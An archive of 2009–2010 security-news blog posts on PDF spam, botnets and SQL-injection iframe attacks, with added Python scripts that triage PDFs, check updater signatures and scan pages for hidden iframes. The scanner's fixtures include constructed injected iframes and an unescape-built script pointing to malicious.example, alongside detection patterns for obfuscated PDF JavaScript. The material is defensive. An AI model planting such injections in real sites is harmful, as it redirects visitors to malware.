PDF Spam Returns With a Malicious Twist

Written by Sue Walsh on July 8, 2010

Security experts have issued a warning about a new spam campaign using PDFs to spread malware. The email arrives with what looks like a note from a friend:

          “Hey man… Remember all those long distance phone calls we made. Well I got my telephone bill and WOW. Please help me and look at the bill see which calls where yours ok…”

The “bill” is attached to the email as “PhoneCalls.pdf” and, if opened, exploits a vulnerability in Adobe Reader in order to download the Sality virus. This virus, which appears to have originated in Russia, is extremely dangerous. It takes over the autorun feature, joins the machine to a peer-to-peer botnet, downloads additional malware, looks for and disables any anti-virus software it finds, looks for and infects executables on any local, remote, and removable drive it can reach, alters the Windows registry to infect any .exe file set to load at startup, and, worst of all, damages every file it infects beyond repair. It is one of the nastiest viruses out there today, and its botnet contains over 100,000 computers.

Adobe says it has released an update that repairs the vulnerability, and if your IT department hasn’t installed it yet, it should do so ASAP. Neither that patch nor running the most recent version of Reader is a guarantee against infection, though: Sality has been around since 2003 and has grown steadily more complex and sophisticated, with no end in sight. It’s important to have an anti-virus solution that can block zero-day attacks and threats, and to treat unsolicited attachments as hostile until they have been scanned, however friendly the covering note sounds.
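A quick way to triage an attachment like “PhoneCalls.pdf” before anyone opens it is to look for the PDF features an exploit needs: an action that fires automatically on open, embedded JavaScript, a /Launch action, or an embedded file. The script below is an added example written for this post, not code from the original article or from Adobe; the two sample PDFs it scans are constructed inline (the “malicious” one merely pops an alert and contains no exploit), and it also decodes the #xx name escapes that attackers use to hide keywords such as /J#61vaScript from naive string matching.

```python
import re

# PDF name objects whose presence in a mail attachment warrants closer inspection.
# /OpenAction and /AA fire automatically, /JavaScript and /JS carry script,
# /Launch starts an external program, /EmbeddedFile carries a payload, and
# /ObjStm means further objects are hidden inside compressed streams.
RISKY_KEYWORDS = ("/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch",
                  "/EmbeddedFile", "/URI", "/SubmitForm", "/RichMedia", "/ObjStm")

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes so /J#61vaScript reads /JavaScript.

    PDF syntax lets any byte of a name be written as #xx; malicious files use
    this to slip keywords past scanners that only match literal strings."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes) -> dict:
    """Count each risky keyword. A name ends at the first non-alphanumeric byte,
    so /JS does not match inside a longer name such as /JSFoo."""
    counts = {}
    for kw in RISKY_KEYWORDS:
        pattern = re.escape(kw.encode()) + rb"(?![A-Za-z0-9])"
        counts[kw] = len(re.findall(pattern, data))
    return counts


def triage(data: bytes) -> dict:
    """Return keyword counts, the reasons the file looks suspicious, and a verdict."""
    raw = count_keywords(data)
    counts = count_keywords(normalize_names(data))
    reasons = []
    # Reader accepts a header anywhere in the first 1024 bytes; anything else is not a PDF.
    if b"%PDF" not in data[:1024]:
        reasons.append("no %PDF header in the first 1024 bytes")
    if any(counts[k] > raw[k] for k in counts):
        reasons.append("keywords obfuscated with #xx name escapes")
    if (counts["/OpenAction"] or counts["/AA"]) and (counts["/JavaScript"] or counts["/JS"]):
        reasons.append("automatic action plus JavaScript: script runs as soon as the file opens")
    if counts["/Launch"]:
        reasons.append("/Launch action can start an external program")
    if counts["/EmbeddedFile"]:
        reasons.append("embedded file payload")
    if counts["/ObjStm"]:
        reasons.append("object streams present: inflate them before trusting zero counts")
    return {"counts": counts, "reasons": reasons,
            "verdict": "suspicious" if reasons else "no risky features seen"}


# Constructed sample files (not the real attachment): one plain page, and one
# with an OpenAction that runs an obfuscated JavaScript action on open.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

MALICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /J#61vaScript /JS (app.alert('constructed sample, no exploit');) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for name, pdf in (("benign", BENIGN_PDF), ("malicious", MALICIOUS_PDF)):
        result = triage(pdf)
        print(name, result["verdict"], result["reasons"])
```

Keyword counts are a triage signal, not proof of an exploit: legitimate forms use JavaScript too, and a zero count means nothing if the objects live inside compressed object streams, which is why /ObjStm is reported separately. Anything flagged should go to a sandbox or a full parser rather than straight to a user’s desktop.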

Judge Orders Permanent Shut Down of Shady ISP

Written by Sue Walsh on June 7, 2010

A U.S. district court judge in California has forced a shady ISP out of business. On April 8th, Judge Ronald Whyte ordered the sale of all assets belonging to Pricewert, also known as 3FN.net. He also ordered the company to forfeit over $1 million in profits to the FTC, profits he says were gained through illegal activity. Security experts helped make the case against them.

          In a disgorgement order, Whyte wrote: “These experts had analyzed data derived from internet searches which establish that defendant, an internet service provider, was engaged in widespread illegal activity, there seems to be little doubt from the information provided that Pricewert functioned primarily as an internet service provider for illegal activity.”

Pricewert has long been known as an ISP that catered to spammers, malware distributors and child pornographers, so news of its closure was cause for celebration by many. The FTC claimed that providing services to botnet herders and spammers was an unfair business practice. Whyte agreed and issued a restraining order against the company last year, barring any upstream provider or data center from providing service to it.

The FTC alleges that Pricewert blatantly ignored take-down orders and ran its own botnets, for which it actively recruited herders. Transcripts of IM chats show employees discussing those botnets with several botnet herders, and officials say nearly 5,000 different types of malware were controlled by those botnets.

The company fired back, accusing the FTC of blaming it for the actions of its customers, but the agency says that only a tiny percentage of the company’s customers were legit.

5 of The Worst Viruses of All Time

Written by Sue Walsh on June 1, 2010

Malware has gone from being a mere nuisance to being a thriving underground business that rakes in millions for cybercriminals. New varieties and variants are being developed everyday. Here’s a look at some of the viruses and malware that will go down in history as being some of the worst:

1. Autorun – This family of worms hit USB thumb drives and other removable storage devices with a vengeance. Once an infected drive was plugged in, the worm looked for a network and, if one was found, used it to spread itself to every other computer attached to it. Autorun infections destroyed data on millions of computers.

2. Sasser – This worm targeted Windows XP and Windows 2000 users and hit the corporate world hard. It forced businesses around the world, including the German postal system, several U.S. airlines and a top French news agency, to shut down or suffer massive delays and foul-ups. It spread by scanning IP addresses for unpatched machines.

3. Klez – This one used email spoofing to spread like wildfire. Once it infected a computer it disabled any anti-virus program it found.

4. Storm – Distributed by one of the most massive botnets in history, Storm exploited headlines and current events to spread itself. It got its name from the very first spam mails it sent out, which included a link that claimed to lead to exclusive footage of the severe storms pounding Europe at the time.

5. SQL Slammer – This worm pounded both the U.S. and South Korea, damaging the systems of many banks, airlines, and other businesses as well as some government agencies. Within 10 minutes of being unleashed on the net it had infected 75,000 computers.

Today’s Top 7 Malware Threats

Written by Sue Walsh on May 3, 2010

Here’s a look at what are considered the top 7 malware threats today, in order:

7. Koobface - This virus has been pounding the net, especially social networking sites, for quite a while now.  Upon infection it floods the user with rogue pop up ads and takes over the user’s email account, using it to send out links to itself and other malware. This could be a nightmare if one or more of the computers on your corporate network were to be infected. Malicious emails sent from your company’s domain would be a PR disaster.

6. DoubleD - This is adware that is often found bundled in with freeware or shareware or lurking on BitTorrent. It delivers rogue pop-ups and hijacks the browser, redirecting it to spam and porn sites. If your employees are allowed to install software (they probably shouldn’t be!), make sure to impress upon them the importance of downloading from legit sites and scanning files before installing them!

5. TDSServ - This is a popular rootkit used by hackers to conceal their malware.  It also scans the system for passwords and other personal info and sends them back to the hacker, and it can take over any email accounts found on the system and send out spam and copies of itself.


New Malware Has a Damaging Twist

Written by Sue Walsh on March 31, 2010

A new type of malware distributes itself by silently overwriting the update function for popular applications like Flash and Adobe Acrobat. While malware masquerading as software updates is very common, this is the first time it’s been seen overwriting the auto-update functions of legitimate software. Written in Visual Basic and called W32.Fakeupver.trojan, it looks exactly like a legit updater, right down to the version number; in fact it’s so convincing that even anti-virus software is fooled.

Once installed it opens DHCP and DNS clients along with a network share and port in order to communicate with its command server and presumably adds the system to a botnet.

What makes the malware particularly dangerous is that once the malware is detected and removed, it leaves the legitimate app it infected without its auto update feature, and that could leave it vulnerable to future attacks if it’s left unable to download critical updates. The user would have to completely re-download and reinstall the affected software, and likely wouldn’t know they had to.

Since many applications like Adobe Reader, Java, Flash, and Windows itself receive near-constant updates and patches, having the update function removed could be disastrous. Scammers have exploited Flash and Java many times, and malicious PDFs are a popular distribution method: 56% of all malware currently comes from malicious PDFs. Experts recommend disabling JavaScript when visiting unfamiliar websites to help protect yourself, but an even better idea is to avoid visiting unfamiliar websites altogether. It’s also a good idea to manually check your apps on a regular basis to make sure they’re properly updated, and that their updaters are still the ones the vendor shipped.
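A malware author who rewrites an updater in Visual Basic cannot also reproduce the vendor’s Authenticode signature, so a cheap check for a swapped updater is whether the binary still carries a signature blob at all and whether its hash has drifted from a baseline you recorded earlier. The script below is an added example written for this post, not code from the article or from any vendor. It parses just enough of the PE header to find the Certificate Table, records SHA-256 hashes, and reports unsigned, changed or missing updaters; the PE images and paths it checks are constructed inline and hypothetical.

```python
import hashlib
import struct
from typing import Dict, List, Optional

IMAGE_DIRECTORY_ENTRY_SECURITY = 4        # data-directory slot of the Certificate Table
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002   # Authenticode signatures use this type


def inspect_pe(data: bytes) -> dict:
    """Report whether a PE image carries an Authenticode signature blob, plus its SHA-256.

    A present certificate table only proves that something is attached; it does
    not verify the signature or the publisher. Use the platform's own signature
    checker for that; this is a cheap first pass for spotting swapped binaries."""
    info = {"sha256": hashlib.sha256(data).hexdigest(), "pe": False, "signed": False, "reason": ""}
    try:
        if data[:2] != b"MZ":
            info["reason"] = "not a PE image (no MZ header)"
            return info
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            info["reason"] = "bad PE signature"
            return info
        info["pe"] = True
        opt = e_lfanew + 4 + 20                      # optional header follows the 20-byte COFF header
        magic = struct.unpack_from("<H", data, opt)[0]
        if magic == 0x10B:
            dirs = opt + 96                          # PE32 data directories
        elif magic == 0x20B:
            dirs = opt + 112                         # PE32+ data directories
        else:
            info["reason"] = "unknown optional header magic 0x%x" % magic
            return info
        num_dirs = struct.unpack_from("<I", data, dirs - 4)[0]   # NumberOfRvaAndSizes
        if num_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
            info["reason"] = "no certificate table slot"
            return info
        cert_off, cert_size = struct.unpack_from("<II", data, dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
        if cert_size == 0:
            info["reason"] = "no Authenticode signature attached"
            return info
        # Unlike the other directories, this entry holds a raw file offset, not an RVA.
        if cert_size < 8 or cert_off + cert_size > len(data):
            info["reason"] = "certificate table points outside the file"
            return info
        length, _revision, cert_type = struct.unpack_from("<IHH", data, cert_off)
        if cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA:
            info["reason"] = "certificate table present but not PKCS#7 signed data"
            return info
        info["signed"] = True
        info["reason"] = "PKCS#7 signature blob of %d bytes attached" % length
    except struct.error:
        info["reason"] = "truncated PE header"
    return info


def audit_updaters(files: Dict[str, bytes], baseline: Optional[Dict[str, str]] = None) -> List[str]:
    """files maps updater path -> bytes on disk; baseline maps path -> SHA-256 recorded earlier.
    Flags unsigned updaters, hash drift since the baseline, and updaters that have vanished."""
    findings = []
    for path, data in files.items():
        info = inspect_pe(data)
        if info["pe"] and not info["signed"]:
            findings.append("%s: %s" % (path, info["reason"]))
        if baseline and path in baseline and baseline[path] != info["sha256"]:
            findings.append("%s: contents changed since baseline" % path)
    for path in sorted((baseline or {}).keys() - files.keys()):
        findings.append("%s: missing; the application has lost its updater" % path)
    return findings


def _fake_pe(magic: int, signed: bool) -> bytes:
    """Constructed minimal PE header for the demo; it is not a runnable program."""
    dir_off = 96 if magic == 0x10B else 112
    opt_size = dir_off + 16 * 8
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C if magic == 0x10B else 0x8664, 0, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, dir_off - 4, 16)                          # NumberOfRvaAndSizes
    cert = b""
    if signed:
        cert = struct.pack("<IHH", 8 + 32, 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + bytes(32)
        struct.pack_into("<II", opt, dir_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                         len(dos) + 4 + len(coff) + opt_size, len(cert))
    return dos + b"PE\0\0" + coff + bytes(opt) + cert


# Constructed scenario (hypothetical paths): two signed updaters are baselined,
# then one is swapped for an unsigned binary and the other is deleted.
ORIGINAL = {"updater_a.exe": _fake_pe(0x10B, True), "updater_b.exe": _fake_pe(0x20B, True)}
BASELINE = {p: inspect_pe(d)["sha256"] for p, d in ORIGINAL.items()}
AFTER_INFECTION = {"updater_a.exe": _fake_pe(0x10B, False)}

if __name__ == "__main__":
    for line in audit_updaters(AFTER_INFECTION, BASELINE):
        print(line)
```

Run it against the real updater directories (Adobe’s ARM folder, the Flash and Java installers) with a baseline taken right after a clean install. A missing updater is the case the post warns about: after the trojan is removed, the application sits silently unpatched unless something notices that its updater is gone.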

Firefox add-on was clean, maker says

Written by John P Mello Jr on February 12, 2010

An add-on program that allegedly infected the computers of 4,000 users of the Firefox Web browser was clean and malware free, according to the maker of the application.

According to Sothink Software, the add-on, Web Video Downloader 4.0, was misidentified as a malware carrier due to a compression utility called Armadillo embedded in Sothink’s offering. The utility is often used by crackers to compress and hide malicious code in malware, the company explained. “That’s the reason why the [virus] scans are hitting on the file as suspicious,” it said, “[T]here isn’t any virus in Web Video downloader or in Armadillo….”

The company added that it hasn’t used Armadillo in the software for quite some time and that the latest release of the add-on, version 5.7, has been certified clean and safe by VirusTotal, an independent multi-engine virus scanning service.

The Video Downloader add-on is a free program that allows a Firefox user to capture Adobe Flash video from Web sites such as YouTube, Google and MSN and save it in a number of formats, including FLV, WMV, ASF, AVI, MOV, RM and RMVB.

Last week, the Mozilla Foundation, makers of Firefox, removed Video Downloader 4.0, as well as another program called Master Filer, from its add-ons (AMO) Web site, claiming the software was infected with malware.


iPad Launch Causes Spike in Apple Spam

Written by Sue Walsh on February 4, 2010

Wednesday’s launch of the highly anticipated Apple iPad has resulted in a spike of Apple related spam. Security researchers say a 30% spike in phishing spam was detected following the announcement as spammers rushed to take advantage of the huge audience looking for info on the device. In addition to phishing spams hawking deals on MacBooks and iPhones, the researchers discovered widespread SEO poisoning designed to lure people searching for terms like “iPad price” or “iPad specs” to malicious sites serving malware, mostly fake anti-virus software.

Security experts are predicting such activities to keep rising as the iPad’s March release date draws closer. They advise users to keep their anti-virus software up to date and to get their Apple news from trusted, familiar sites. Companies should review their site security and keep a close eye on their code as many of the poisoned search results point toward legit sites that have been compromised by SQL injection attacks.

Over 25 Million New Strains of Malware Identified in 2009

Written by Sue Walsh on January 31, 2010

A new report out by security experts says that over 25 million new strains of malware were discovered in 2009, and that number is expected to rise in 2010. Trojans are the most popular type distributed, making up 66% of all malware, followed by adware at 17%. Adware includes scareware such as fake anti-virus, fake registry cleaners, and fake anti-spyware programs. Viruses, spyware, rootkits and worms make up the remainder.

The report also identified Taiwan (62.20%), Russia (56.77%) and Poland (55.40%) as the countries with the highest levels of malware infected computers and Sweden (31.63%), Portugal (37.79%) and the Netherlands (38.02%) as the countries with the lowest infection levels. The United States is in the middle with about a 50% infection level. Many of these infections may not even be known to the user. Millions of computers have been turned into “zombies” and added to botnets.

Experts say malware attacks will be on the rise and become more and more sophisticated as scammers develop new techniques to avoid detection. Social networking sites will bear much of the brunt as spammers and scammers seek to take advantage of the huge audiences these sites attract. Facebook has 400 million members and Twitter over 15 million in the US alone.

As 2010 continues to unfold stay with All Spammed Up for the latest spam and security news. It’s going to be an interesting year.

Fake Outlook Notifications Spreading Malware

Written by Sue Walsh on January 12, 2010

Security experts have detected a new phishing campaign that uses fake Microsoft Outlook notifications to spread malware. Over a million of the spam messages have been intercepted by spam and phishing filters since Thursday.

The messages look like an alert from the recipient’s IT department notifying them that a security upgrade is available and asking them to log into their accounts to retrieve the new settings. The link in the messages leads to a fake Outlook Web Access page which asks them to download a file containing the new security settings. The file is actually an .exe containing the Zbot banking Trojan.

What sets this spear phishing attack apart from past ones is the sheer volume of messages being sent out and the fact that the messages are highly personalized to each domain they are sent to.

In a related attack, search engine results for “office.microsoft.com” have been poisoned with pages leading to fake anti-virus software sites. 2010 has kicked off with a bang for malware distributors, hackers, and spammers. They are growing more and more sophisticated every day, meaning 2010 could be a record year for attacks.

New Malware Attack Infects Nearly 300,000 Sites

Written by Sue Walsh on December 24, 2009

A security researcher recently discovered a new malware attack that has poisoned nearly 300,000 websites. The SQL injection attacks began last month and plant a hidden iframe that redirects visitors to a malicious site programmed to look for and exploit known vulnerabilities in several different apps, including Adobe Flash, ActiveX, IE, and several other Microsoft applications. If one is found, a backdoor detected as Backdoor.Win32.Buzus.croo is installed. This malware steals banking information and likely downloads even more malware to the infected system. It’s believed to be related to the Rustock botnet.
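Site owners told to “keep a close eye on their code” after the iPad SEO-poisoning post and this one need something that actually looks for the injected iframe. The scanner below is an added example written for this post, not code from the original article or from the researcher it cites. It walks a page with the standard-library HTML parser and reports iframes that are both hidden (zero size, display:none, visibility:hidden, or pushed off-screen) and point to a host other than the site’s own, plus iframes assembled from escaped text inside a script block, a trick the mass-injection campaigns used to dodge tag filters. The pages and the site name “shop.example” are constructed for the demo.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS that hides an iframe from the visitor while the browser still loads it.
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
# Iframes built at run time from escaped text, e.g. document.write(unescape('%3Ciframe ...')).
SCRIPT_BUILT_IFRAME = re.compile(r"%3Ciframe|\\x3ciframe|\\u003ciframe", re.I)


def _tiny(value) -> bool:
    """True for width/height attributes of 0 or 1 pixel."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1


class _IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []
        self.script_built = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here verbatim, so escaped tags are still visible to us.
        if self._in_script and SCRIPT_BUILT_IFRAME.search(data):
            self.script_built = True


def find_hidden_iframes(html: str, site_host: str) -> list:
    """Return iframes that are hidden AND point off-site, plus a marker for
    script-built iframes. Visible third-party embeds (a video player) and hidden
    same-origin frames are deliberately left alone to keep the noise down."""
    p = _IframeCollector()
    p.feed(html)
    p.close()
    findings = []
    for attrs in p.iframes:
        reasons = []
        if _tiny(attrs.get("width")) or _tiny(attrs.get("height")):
            reasons.append("zero or one pixel size")
        if HIDDEN_CSS.search(attrs.get("style", "")):
            reasons.append("hidden by CSS")
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or site_host).lower()   # relative src stays on-site
        if reasons and host != site_host.lower():
            findings.append({"src": src, "host": host, "reasons": reasons})
    if p.script_built:
        findings.append({"src": "(built by script)", "host": "?",
                         "reasons": ["iframe assembled from escaped text in <script>"]})
    return findings


# Constructed sample content for a hypothetical site "shop.example".
CLEAN_PAGE = """<html><body><h1>Catalogue</h1>
<iframe src="https://www.youtube.com/embed/demo" width="560" height="315"></iframe>
</body></html>"""

# The same page after a mass SQL injection appended an invisible redirect.
INFECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://malicious.example/in.cgi?3" width="0" height="0" '
    'style="visibility:hidden"></iframe></body>')

# A stored text column where the payload was written as script to dodge tag filters.
INFECTED_RECORD = ('Blue widget, 5 pack'
                   '<script>document.write(unescape("%3Ciframe src=http://malicious.example/x%3E"))'
                   '</script>')

if __name__ == "__main__":
    for label, content in (("clean", CLEAN_PAGE), ("page", INFECTED_PAGE), ("record", INFECTED_RECORD)):
        print(label, find_hidden_iframes(content, "shop.example"))
```

Because the injection lands in the database rather than in the page templates, run this over the raw text columns (descriptions, comments, titles) as well as over the rendered pages; the typical payload is appended to every text field of every table the injected query could reach. Tune the hidden-plus-external rule to your own site: some analytics and ad frameworks legitimately use tiny third-party iframes, so whitelist those hosts rather than loosening the check.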

Rustock, together with Cutwail, Zeus and Mega-D, controls over 5 million computers and sends out billions of spam messages. The shutdowns of cybercrime-friendly ISPs McColo and Real Host have done little to stop them; in fact current spam levels have exceeded pre-McColo ones. Experts say botnet herders no longer rely on a single ISP or domain, so if a shutdown happens they are back up in hours instead of weeks or months.

Experts say that because the attack only exploits known, already-patched vulnerabilities, those with properly updated and patched systems are in no danger from it, so make sure all your users are protected.